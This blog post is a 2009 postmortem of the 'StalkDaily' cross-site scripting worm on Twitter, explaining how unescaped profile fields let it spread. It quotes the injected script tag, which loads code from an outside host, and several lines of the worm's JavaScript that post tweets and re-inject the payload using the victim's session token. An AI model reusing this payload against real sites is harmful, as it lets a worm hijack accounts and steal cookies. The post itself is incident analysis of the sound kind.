Damon Cortesi's blog

Musings of an entrepreneur.

Twitter StalkDaily Worm Postmortem

| Comments

Twitter got hit with a little security incident this afternoon we’ll call the “StalkDaily Worm”. I have no clue if the StalkDaily site was actually associated with the worm at this point or if it was simply a misdirection. I believe it to be the latter.

At around 3:43pm PST this afternoon I noticed some odd updates from a couple of my friends regarding the StalkDaily site. I then saw this tweet from @JoeCascio:

First virus-like hack of Twitter is StalkDaily.com. Looks like a code injection in the Location field of your profile.

Coming from Joe, I knew something was up. Looking at one of the infected profiles I saw a link to the StalkDaily site, but then also some script tags. These typically aren’t allowed as part of a profile URL and looked suspicious:

<a href="http://www.stalkdaily.com"/><<font color="red">script src="hxxp://mikeyylolz.uuuq.com/x.js</font>>"

That part in red is particularly bad and is what was getting injected into people’s profiles. Taking a quick look at the JavaScript that it actually links to, there were a few lines in particular that caught my eye:

var <font color="red">update</font> = urlencode("Hey everyone, join www.StalkDaily.com. It's a site like Twitter but with pictures, videos, and so much more! :)");
var <font color="red">xss</font> = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');

var ajaxConn = new XHConn();
ajaxConn.connect("<font color="red">/status/update</font>", "POST", "authenticity_token="+authtoken+"&status="+<font color="red">update</font>+"&tab=home&update=update");
ajaxConn1.connect("<font color="red">/account/settings</font>", "POST", "authenticity_token="+authtoken+"&user[url]="+<font color="red">xss</font>+"&tab=home&update=update");

What’s happening here is that it looks like somebody realized they could save url encoded data to the profile URL field that would not be properly escaped when re-displayed. This is particularly nasty because you could get infected simply by viewing somebody’s profile page on Twitter that was already infected. If you visited an infected profile, the JavaScript in the profile would execute and by doing so tweet the mis-leading link, and update your profile with the same malicious JavaScript thereby infecting anybody that then visits your profile on twitter.com.

This was a nasty little script.

This is also one of the reasons that I browse the web with NoScript. It’s a hassle, sure, but it prevented the script from an untrusted domain (uuuq.com) from running on Twitter.com.

As we’ve seen with worms in the past, this attack was loud and noisy and all the attackers did was collect your Twitter username and cookie. Had they been playing for real, a more profitable approach would have been to leave your profile URL intact and insert some JavaScript that turned your browser into an endpoint on a bot network. </doomandgloom>

It looks like Twitter has already taken care of the issue for the most part. Thanks to @al3x and crew for their near-instant response on what was likely a nice relaxing Saturday afternoon.

If you have the stalkdaily URL in your profile, you were likely attacked by this issue. Twitter has taken care of it at this point, so feel free to correct your URL and continue with your Saturday evening Twittering. There’s some more information on this post.

Be safe out there - the Internet is a dangerous place. :)

Update (2009-04-12): A brief update - another round of the worm hit Twitter on Sunday morning. It was effectively the same thing, but attacked a different field. The code, oddly enough, had also been run through an obfuscator. You can see the partially obfuscated code from the second worm here: second version of worm.